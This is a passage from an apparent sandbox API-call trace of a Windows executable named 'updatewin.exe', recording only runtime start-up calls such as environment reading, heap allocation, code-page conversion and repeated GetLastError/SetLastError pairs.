GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0077.555] SetHandleCount (uNumber=0x20) returned 0x20 [0077.555] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe\" " [0077.555] GetEnvironmentStringsW () returned 0x5f4e60* [0077.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0077.555] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x565) returned 0x2611f8 [0077.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2611f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0077.555] FreeEnvironmentStringsW (penv=0x5f4e60) returned 1 [0077.555] GetLastError () returned 0x0 [0077.556] SetLastError (dwErrCode=0x0) [0077.556] GetLastError () returned 0x0 [0077.556] SetLastError (dwErrCode=0x0) [0077.556] GetLastError () returned 0x0 [0077.556] SetLastError (dwErrCode=0x0) [0077.556] GetACP () returned 0x4e4 [0077.556] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x220) returned 0x261768 [0077.556] GetLastError () returned 0x0 [0077.556] SetLastError (dwErrCode=0x0) [0077.556] IsValidCodePage (CodePage=0x4e4) returned 1 [0077.556] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0077.556] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0077.556] GetLastError () returned 0x0 [0077.556] SetLastError (dwErrCode=0x0) [0077.556] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0077.557] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.557] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0077.557] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0077.557] GetLastError () returned 0x0 [0077.557] SetLastError (dwErrCode=0x0) [0077.557] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0077.557] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.557] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ똲誶㞥AĀ") returned 256 [0077.557] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ똲誶㞥AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0077.557] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ똲誶㞥AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0077.557] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x9d\x18¹…\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0077.557] GetLastError () returned 0x0 [0077.557] SetLastError (dwErrCode=0x0) [0077.557] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.557] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ똲誶㞥AĀ") returned 256 [0077.557] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ똲誶㞥AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0077.557] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ똲誶㞥AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0077.557] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x9d\x18¹…\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0077.558] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43b480, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe")) returned 0x5e [0077.558] GetLastError () returned 0x0 [0077.558] SetLastError (dwErrCode=0x0) [0077.558] GetLastError () returned 0x0 [0077.558] SetLastError (dwErrCode=0x0) [0077.558] GetLastError () returned 0x0 [0077.558] SetLastError (dwErrCode=0x0) [0077.558] GetLastError () returned 0x0 [0077.558] SetLastError (dwErrCode=0x0) [0077.558] GetLastError () returned 0x0 [0077.558] SetLastError (dwErrCode=0x0) [0077.558] GetLastError () returned 0x0 [0077.558] SetLastError (dwErrCode=0x0) [0077.558] GetLastError () returned 0x0 [0077.558] SetLastError (dwErrCode=0x0) [0077.558] GetLastError () returned 0x0 [0077.559] SetLastError (dwErrCode=0x0) [0077.559] GetLastError () returned 0x0 [0077.559] SetLastError (dwErrCode=0x0) [0077.559] GetLastError () returned 0x0 [0077.559] SetLastError (dwErrCode=0x0) [0077.559] GetLastError () returned 0x0 [0077.559] SetLastError (dwErrCode=0x0) [0077.559] GetLastError () returned 0x0 [0077.559] SetLastError (dwErrCode=0x0) [0077.559] GetLastError () returned 0x0 [0077.559] SetLastError (dwErrCode=0x0) [0077.559] GetLastError () returned 0x0 [0077.559] SetLastError (dwErrCode=0x0) [0077.559] GetLastError () returned 0x0 [0077.559] SetLastError (dwErrCode=0x0) [0077.559] GetLastError () returned 0x0 [0077.559] SetLastError (dwErrCode=0x0) [0077.559] GetLastError () returned 0x0 [0077.560] SetLastError (dwErrCode=0x0) [0077.560] GetLastError () returned 0x0 [0077.560] SetLastError (dwErrCode=0x0) [0077.560] GetLastError () returned 0x0 [0077.560] SetLastError (dwErrCode=0x0) [0077.560] GetLastError () returned 0x0 [0077.560] SetLastError (dwErrCode=0x0) [0077.560] GetLastError () returned 0x0 [0077.560] SetLastError (dwErrCode=0x0) [0077.560] GetLastError () returned 0x0 [0077.560] SetLastError (dwErrCode=0x0) [0077.560] GetLastError () returned 0x0 [0077.560] SetLastError (dwErrCode=0x0) [0077.560] GetLastError () returned 0x0 [0077.560] SetLastError (dwErrCode=0x0) [0077.560] GetLastError () returned 0x0 [0077.561] SetLastError (dwErrCode=0x0) [0077.561] GetLastError () returned 0x0 [0077.561] SetLastError (dwErrCode=0x0) [0077.561] GetLastError () returned 0x0 [0077.561] SetLastError (dwErrCode=0x0) [0077.561] GetLastError () returned 0x0 [0077.561] SetLastError (dwErrCode=0x0) [0077.561] GetLastError () returned 0x0 [0077.561] SetLastError (dwErrCode=0x0) [0077.561] GetLastError () returned 0x0 [0077.561] SetLastError (dwErrCode=0x0) [0077.561] GetLastError () returned 0x0 [0077.561] SetLastError (dwErrCode=0x0) [0077.561] GetLastError () returned 0x0 [0077.561] SetLastError (dwErrCode=0x0) [0077.562] GetLastError () returned 0x0 [0077.562] SetLastError (dwErrCode=0x0) [0077.562] GetLastError () returned 0x0 [0077.562] SetLastError (dwErrCode=0x0) [0077.562] GetLastError () returned 0x0 [0077.562] SetLastError (dwErrCode=0x0) [0077.562] GetLastError () returned 0x0 [0077.562] SetLastError (dwErrCode=0x0) [0077.562] GetLastError () returned 0x0 [0077.562] SetLastError (dwErrCode=0x0) [0077.562] GetLastError () returned 0x0 [0077.562] SetLastError (dwErrCode=0x0) [0077.562] GetLastError () returned 0x0 [0077.562] SetLastError (dwErrCode=0x0) [0077.562] GetLastError () returned 0x0 [0077.562] SetLastError (dwErrCode=0x0) [0077.562] GetLastError () returned 0x0 [0077.563] SetLastError (dwErrCode=0x0) [0077.563] GetLastError () returned 0x0 [0077.563] SetLastError (dwErrCode=0x0) [0077.563] GetLastError () returned 0x0 [0077.563] SetLastError (dwErrCode=0x0) [0077.563] GetLastError () returned 0x0 [0077.563] SetLastError (dwErrCode=0x0) [0077.563] GetLastError () returned 0x0 [0077.563] SetLastError (dwErrCode=0x0) [0077.563] GetLastError () returned 0x0 [0077.563] SetLastError (dwErrCode=0x0) [0077.563] GetLastError () returned 0x0 [0077.563] SetLastError (dwErrCode=0x0) [0077.563] GetLastError () returned 0x0 [0077.563] SetLastError (dwErrCode=0x0) [0077.563] GetLastError () returned 0x0 [0077.563] SetLastError (dwErrCode=0x0) [0077.564] GetLastError () returned 0x0 [0077.564] SetLastError (dwErrCode=0x0) [0077.564] GetLastError () returned 0x0 [0077.564] SetLastError (dwErrCode=0x0) [0077.564] GetLastError () returned 0x0 [0077.564] SetLastError (dwErrCode=0x0) [0077.564] GetLastError () returned 0x0 [0077.564] SetLastError (dwErrCode=0x0) [0077.564] GetLastError () returned 0x0 [0077.564] SetLastError (dwErrCode=0x0) [0077.564] GetLastError () returned 0x0 [0077.564] SetLastError (dwErrCode=0x0) [0077.564] GetLastError () returned 0x0 [0077.564] SetLastError (dwErrCode=0x0) [0077.564] GetLastError () returned 0x0 [0077.564] SetLastError (dwErrCode=0x0) [0077.564] GetLastError () returned 0x0 [0077.564] SetLastError (dwErrCode=0x0) [0077.564] GetLastError () returned 0x0 [0077.564] SetLastError (dwErrCode=0x0) [0077.564] GetLastError () returned 0x0 [0077.565] SetLastError (dwErrCode=0x0) [0077.565] GetLastError () returned 0x0 [0077.565] SetLastError (dwErrCode=0x0) [0077.565] GetLastError () returned 0x0 [0077.565] SetLastError (dwErrCode=0x0) [0077.565] GetLastError () returned 0x0 [0077.565] SetLastError (dwErrCode=0x0) [0077.565] GetLastError () returned 0x0 [0077.565] SetLastError (dwErrCode=0x0) [0077.565] GetLastError () returned 0x0 [0077.565] SetLastError (dwErrCode=0x0) [0077.565] GetLastError () returned 0x0 [0077.565] SetLastError (dwErrCode=0x0) [0077.565] GetLastError () returned 0x0 [0077.565] SetLastError (dwErrCode=0x0) [0077.565] GetLastError () returned 0x0 [0077.565] SetLastError (dwErrCode=0x0) [0077.565] GetLastError () returned 0x0 [0077.565] SetLastError (dwErrCode=0x0) [0077.565] GetLastError () returned 0x0 [0077.565] SetLastError (dwErrCode=0x0) [0077.565] GetLastError () returned 0x0 [0077.566] SetLastError (dwErrCode=0x0) [0077.566] GetLastError () returned 0x0 [0077.566] SetLastError (dwErrCode=0x0) [0077.566] GetLastError () returned 0x0 [0077.566] SetLastError (dwErrCode=0x0) [0077.566] GetLastError () returned 0x0 [0077.566] SetLastError (dwErrCode=0x0) [0077.566] GetLastError () returned 0x0 [0077.566] SetLastError (dwErrCode=0x0) [0077.566] GetLastError () returned 0x0 [0077.566] SetLastError (dwErrCode=0x0) [0077.566] GetLastError () returned 0x0 [0077.566] SetLastError (dwErrCode=0x0) [0077.566] GetLastError () returned 0x0 [0077.566] SetLastError (dwErrCode=0x0) [0077.566] GetLastError () returned 0x0 [0077.566] SetLastError (dwErrCode=0x0) [0077.566] GetLastError () returned 0x0 [0077.566] SetLastError (dwErrCode=0x0) [0077.566] GetLastError () returned 0x0 [0077.567] SetLastError (dwErrCode=0x0) [0077.567] GetLastError () returned 0x0 [0077.567] SetLastError (dwErrCode=0x0) [0077.567] GetLastError () returned 0x0 [0077.567] SetLastError (dwErrCode=0x0) [0077.567] GetLastError () returned 0x0 [0077.567] SetLastError (dwErrCode=0x0) [0077.567] GetLastError () returned 0x0 [0077.567] SetLastError (dwErrCode=0x0) [0077.567] GetLastError () returned 0x0 [0077.567] SetLastError (dwErrCode=0x0) [0077.567] GetLastError () returned 0x0 [0077.745] SetLastError (dwErrCode=0x0) [0077.745] GetLastError () returned 0x0 [0077.745] SetLastError (dwErrCode=0x0) [0077.745] GetLastError () returned 0x0 [0077.746] SetLastError (dwErrCode=0x0) [0077.746] GetLastError () returned 0x0 [0077.746] SetLastError (dwErrCode=0x0) [0077.746] GetLastError () returned 0x0 [0077.746] SetLastError (dwErrCode=0x0) [0077.746] GetLastError () returned 0x0 [0077.746] SetLastError (dwErrCode=0x0) [0077.746] GetLastError () returned 0x0 [0077.746] SetLastError (dwErrCode=0x0) [0077.746] GetLastError () returned 0x0 [0077.746] SetLastError (dwErrCode=0x0) [0077.746] GetLastError () returned 0x0 [0077.746] SetLastError (dwErrCode=0x0) [0077.747] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x67) returned 0x261990 [0077.747] GetLastError () returned 0x0 [0077.747] SetLastError (dwErrCode=0x0) [0077.747] GetLastError () returned 0x0 [0077.747] SetLastError (dwErrCode=0x0) [0077.747] GetLastError () returned 0x0 [0077.747] SetLastError (dwErrCode=0x0) [0077.747] GetLastError () returned 0x0 [0077.747] SetLastError (dwErrCode=0x0) [0077.747] GetLastError () returned 0x0 [0077.747] SetLastError (dwErrCode=0x0) [0077.747] GetLastError () returned 0x0 [0077.747] SetLastError (dwErrCode=0x0) [0077.747] GetLastError () returned 0x0 [0077.748] SetLastError (dwErrCode=0x0) [0077.748] GetLastError () returned 0x0 [0077.748] SetLastError (dwErrCode=0x0) [0077.748] GetLastError () returned 0x0 [0077.748] SetLastError (dwErrCode=0x0) [0077.748] GetLastError () returned 0x0 [0077.748] SetLastError (dwErrCode=0x0) [0077.748] GetLastError () returned 0x0 [0077.748] SetLastError (dwErrCode=0x0) [0077.748] GetLastError () returned 0x0 [0077.748] SetLastError (dwErrCode=0x0) [0077.748] GetLastError () returned 0x0 [0077.749] SetLastError (dwErrCode=0x0) [0077.749] GetLastError () returned 0x0 [0077.749] SetLastError (dwErrCode=0x0) [0077.749] GetLastError () returned 0x0 [0077.749] SetLastError (dwErrCode=0x0) [0077.749] GetLastError () returned 0x0 [0077.749] SetLastError (dwErrCode=0x0) [0077.749] GetLastError () returned 0x0 [0077.749] SetLastError (dwErrCode=0x0) [0077.749] GetLastError () returned 0x0 [0077.749] SetLastError (dwErrCode=0x0) [0077.749] GetLastError () returned 0x0 [0077.749] SetLastError (dwErrCode=0x0) [0077.749] GetLastError () returned 0x0 [0077.750] SetLastError (dwErrCode=0x0) [0077.750] GetLastError () returned 0x0 [0077.750] SetLastError (dwErrCode=0x0) [0077.750] GetLastError () returned 0x0 [0077.750] SetLastError (dwErrCode=0x0) [0077.750] GetLastError () returned 0x0 [0077.750] SetLastError (dwErrCode=0x0) [0077.750] 